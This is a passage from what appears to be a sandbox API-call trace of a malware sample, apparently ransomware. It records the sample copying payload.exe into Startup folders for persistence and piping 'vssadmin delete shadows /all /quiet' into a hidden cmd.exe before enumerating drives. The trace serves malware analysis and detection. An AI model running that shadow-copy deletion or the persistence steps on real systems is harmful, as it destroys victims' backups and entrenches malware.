Ptr=0x604a38, Size=0x20) returned 0x6058e8 [0031.285] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0031.285] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0031.285] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0031.285] lstrlenW (lpString="kernel32.dll") returned 12 [0031.285] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x605938 | out: hHeap=0x5d0000) returned 1 [0031.285] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0031.285] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6058e8 | out: hHeap=0x5d0000) returned 1 [0031.285] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\payload.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\payload.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4 [0031.285] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\payload.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe8 [0031.287] ReadFile (in: hFile=0xe4, lpBuffer=0x20b0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x20b0020*, lpNumberOfBytesRead=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0031.299] WriteFile (in: hFile=0xe8, lpBuffer=0x20b0020*, nNumberOfBytesToWrite=0x17200, lpNumberOfBytesWritten=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x20b0020*, lpNumberOfBytesWritten=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0031.301] ReadFile (in: hFile=0xe4, lpBuffer=0x20b0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x20b0020*, lpNumberOfBytesRead=0x18fd98*=0x0, lpOverlapped=0x0) returned 1 [0031.301] CloseHandle (hObject=0xe8) returned 1 [0031.302] CloseHandle (hObject=0xe4) returned 1 [0031.302] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x604a38 [0031.302] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x604a38, Size=0x20) returned 0x6058e8 [0031.302] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x604a38 [0031.302] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x604a38, Size=0x20) returned 0x605938 [0031.302] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0031.302] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0031.302] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0031.302] lstrlenW (lpString="kernel32.dll") returned 12 [0031.302] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x605938 | out: hHeap=0x5d0000) returned 1 [0031.302] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0031.302] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6058e8 | out: hHeap=0x5d0000) returned 1 [0031.302] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x20b0020 | out: hHeap=0x5d0000) returned 1 [0031.307] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x62d440 [0031.307] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x63d448 [0031.307] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x604a38 [0031.307] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x604a38, Size=0x20) returned 0x6058e8 [0031.307] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6058e8, Size=0x40) returned 0x606a40 [0031.307] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x606a40, Size=0x80) returned 0x62b458 [0031.307] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x62b458, Size=0x100) returned 0x607bb8 [0031.307] lstrlenW (lpString="") returned 0 [0031.307] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0031.307] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8c) returned 0x607cc0 [0031.307] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fd18 | out: phkResult=0x18fd18*=0xe4) returned 0x0 [0031.307] RegQueryValueExW (in: hKey=0xe4, lpValueName="Common Startup", lpReserved=0x0, lpType=0x18fd24, lpData=0x63d448, lpcbData=0x18fd50*=0x7fff | out: lpType=0x18fd24*=0x2, lpData="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x18fd50*=0x78) returned 0x0 [0031.307] RegCloseKey (hKey=0xe4) returned 0x0 [0031.307] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x607cc0 | out: hHeap=0x5d0000) returned 1 [0031.307] lstrlenW (lpString="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 59 [0031.307] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0031.307] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x607bb8 | out: hHeap=0x5d0000) returned 1 [0031.307] ExpandEnvironmentStringsW (in: lpSrc="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe", lpDst=0x62d440, nSize=0x7fff | out: lpDst="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe") returned 0x49 [0031.307] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x63d448 | out: hHeap=0x5d0000) returned 1 [0031.307] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x62d440 | out: hHeap=0x5d0000) returned 1 [0031.307] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x100000) returned 0x20b0020 [0031.308] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x604a38 [0031.308] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x604a38, Size=0x20) returned 0x6058e8 [0031.308] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x604a38 [0031.308] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x604a38, Size=0x20) returned 0x605938 [0031.308] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0031.308] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0031.308] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0031.308] lstrlenW (lpString="kernel32.dll") returned 12 [0031.308] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6058e8 | out: hHeap=0x5d0000) returned 1 [0031.308] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0031.308] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x605938 | out: hHeap=0x5d0000) returned 1 [0031.308] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\payload.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\payload.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4 [0031.308] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\payload.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe8 [0031.311] ReadFile (in: hFile=0xe4, lpBuffer=0x20b0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x20b0020*, lpNumberOfBytesRead=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0031.322] WriteFile (in: hFile=0xe8, lpBuffer=0x20b0020*, nNumberOfBytesToWrite=0x17200, lpNumberOfBytesWritten=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x20b0020*, lpNumberOfBytesWritten=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0031.325] ReadFile (in: hFile=0xe4, lpBuffer=0x20b0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x20b0020*, lpNumberOfBytesRead=0x18fd98*=0x0, lpOverlapped=0x0) returned 1 [0031.325] CloseHandle (hObject=0xe8) returned 1 [0031.326] CloseHandle (hObject=0xe4) returned 1 [0031.326] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x604a38 [0031.326] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x604a38, Size=0x20) returned 0x605938 [0031.326] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x604a38 [0031.326] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x604a38, Size=0x20) returned 0x6058e8 [0031.326] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0031.326] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0031.326] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0031.326] lstrlenW (lpString="kernel32.dll") returned 12 [0031.326] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6058e8 | out: hHeap=0x5d0000) returned 1 [0031.326] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0031.326] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x605938 | out: hHeap=0x5d0000) returned 1 [0031.326] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x20b0020 | out: hHeap=0x5d0000) returned 1 [0031.331] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60b430 | out: hHeap=0x5d0000) returned 1 [0031.331] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61b438 | out: hHeap=0x5d0000) returned 1 [0031.331] lstrlenW (lpString="%windir%\\System32") returned 17 [0031.331] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6069b0 | out: hHeap=0x5d0000) returned 1 [0031.331] lstrlenW (lpString="%appdata%") returned 9 [0031.331] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e43a0 | out: hHeap=0x5d0000) returned 1 [0031.331] lstrlenW (lpString="%sh(Startup)%") returned 13 [0031.331] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e4378 | out: hHeap=0x5d0000) returned 1 [0031.331] lstrlenW (lpString="%sh(Common Startup)%") returned 20 [0031.331] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6069f8 | out: hHeap=0x5d0000) returned 1 [0031.331] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x604a38 [0031.331] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x604a38, Size=0x20) returned 0x5e4378 [0031.331] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4378, Size=0x40) returned 0x6069f8 [0031.331] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6069f8, Size=0x80) returned 0x62b458 [0031.331] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x604a38 [0031.331] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x604a38, Size=0x20) returned 0x5e4378 [0031.331] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1fffc) returned 0x60b430 [0031.331] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x62d440 [0031.331] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x63d448 [0031.331] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x604a38 [0031.331] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x604a38, Size=0x20) returned 0x5e43a0 [0031.331] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e43a0, Size=0x40) returned 0x6069f8 [0031.331] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6069f8, Size=0x80) returned 0x62b4e0 [0031.331] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x62b4e0, Size=0x100) returned 0x607bb8 [0031.331] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0031.331] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x607bb8 | out: hHeap=0x5d0000) returned 1 [0031.331] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x62d440, nSize=0x7fff | out: lpDst="C:\\Windows\\system32\\cmd.exe") returned 0x1c [0031.331] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x63d448 | out: hHeap=0x5d0000) returned 1 [0031.332] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x62d440 | out: hHeap=0x5d0000) returned 1 [0031.332] CreatePipe (in: hReadPipe=0x18fd58, hWritePipe=0x18fd5c, lpPipeAttributes=0x18fd48, nSize=0x0 | out: hReadPipe=0x18fd58*=0xe8, hWritePipe=0x18fd5c*=0xec) returned 1 [0031.332] CreatePipe (in: hReadPipe=0x18fdc8, hWritePipe=0x18fdcc, lpPipeAttributes=0x18fd48, nSize=0x0 | out: hReadPipe=0x18fdc8*=0xf0, hWritePipe=0x18fdcc*=0xf4) returned 1 [0031.332] SetHandleInformation (hObject=0xec, dwMask=0x1, dwFlags=0x0) returned 1 [0031.332] SetHandleInformation (hObject=0xf0, dwMask=0x1, dwFlags=0x0) returned 1 [0031.332] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18fd68*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe8, hStdOutput=0xf4, hStdError=0xf4), lpProcessInformation=0x18fdb8 | out: lpCommandLine=0x0, lpProcessInformation=0x18fdb8*(hProcess=0xfc, hThread=0xf8, dwProcessId=0x970, dwThreadId=0x974)) returned 1 [0031.350] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0031.350] WriteFile (in: hFile=0xec, lpBuffer=0x62b458*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x18fd64, lpOverlapped=0x0 | out: lpBuffer=0x62b458*, lpNumberOfBytesWritten=0x18fd64*=0x41, lpOverlapped=0x0) returned 1 [0031.350] CloseHandle (hObject=0xfc) returned 1 [0031.350] CloseHandle (hObject=0xf8) returned 1 [0031.350] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60b430 | out: hHeap=0x5d0000) returned 1 [0031.350] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0031.351] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x62b458 | out: hHeap=0x5d0000) returned 1 [0031.351] lstrlenW (lpString="%comspec%") returned 9 [0031.351] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e4378 | out: hHeap=0x5d0000) returned 1 [0031.351] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a530, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf8 [0031.351] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x604a38 [0031.351] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a710, lpParameter=0x604a38, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0031.352] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x5e47b0 [0031.352] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4098e0, lpParameter=0x5e47b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x104 [0031.352] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x604a50 [0031.352] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x604a50, Size=0x20) returned 0x5e4378 [0031.352] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4378, Size=0x40) returned 0x6069f8 [0031.352] lstrlenW (lpString="ABCDEFGHIJKLMNOPQRSTUVWXYZ") returned 26 [0031.352] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xd0) returned 0x607c30 [0031.352] GetLogicalDrives () returned 0x4 [0031.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10014) returned 0x60b430 [0031.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x604a50 [0031.353] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x604a50, Size=0x20) returned 0x5e4378 [0031.353] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4378, Size=0x40) returned 0x606a88 [0031.353] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x606a88, Size=0x80) returned 0x62b458 [0031.353] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x62b458, Size=0x100) returned 0x6091a0 [0031.353] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6091a0, Size=0x200) returned 0x6091a0 [0031.353] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6091a0, Size=0x400) returned 0x6091a0 [0031.353] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6091a0, Size=0x800) returned 0x6097b8 [0031.353] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6097b8, Size=0x1000) returned 0x61b450 [0031.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x62d440 [0031.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x604a50 [0031.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x604b28 [0031.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x5e4758 [0031.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x604b40 [0031.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x5e4768 [0031.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x604b58 [0031.353] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4768, Size=0x8) returned 0x5e4768 [0031.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x604b70 [0031.353] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4768, Size=0x10) returned 0x5e4720 [0031.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x604b88 [0031.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x604ba0 [0031.353] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4720, Size=0x20) returned 0x607ab8 [0031.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x604bb8 [0031.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x5e4768 [0031.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xe) returned 0x604bd0 [0031.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xe) returned 0x604be8 [0031.353] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x607ab8, Size=0x40) returned 0x6052e0 [0031.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xe) returned 0x604c00 [0031.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xe) returned 0x604c18 [0031.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xe) returned 0x604c30 [0031.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xe) returned 0x604c48 [0031.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x604c60 [0031.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x604c78 [0031.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x605328 [0031.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x604c90 [0031.353] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6052e0, Size=0x80) returned 0x6091a0 [0031.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x604ca8 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x604cc0 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x604cd8 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x604cf0 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6097d0 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x6097e8 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609800 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x5e4720 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609818 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609830 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x609848 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609860 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x609878 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609890 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x6098a8 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6098c0 [0031.354] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6091a0, Size=0x100) returned 0x6091a0 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6098d8 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6098f0 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609908 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x609920 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609938 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609950 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x5e4730 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609968 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609980 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609998 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6) returned 0x607ab8 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6099b0 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6099c8 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x607ac8 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6099e0 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6099f8 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x609a10 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609a28 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609a40 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609a58 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xe) returned 0x609a70 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609a88 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x609aa0 [0031.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609ab8 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609ad0 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609ae8 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609b00 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x607ad8 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609b18 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609b30 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609b48 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609b60 [0031.355] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6091a0, Size=0x200) returned 0x6091a0 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609b78 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x6052e0 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609b90 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609bd0 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609be8 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609c00 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609c18 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609c30 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609c48 [0031.355] RtlAllocateHeap 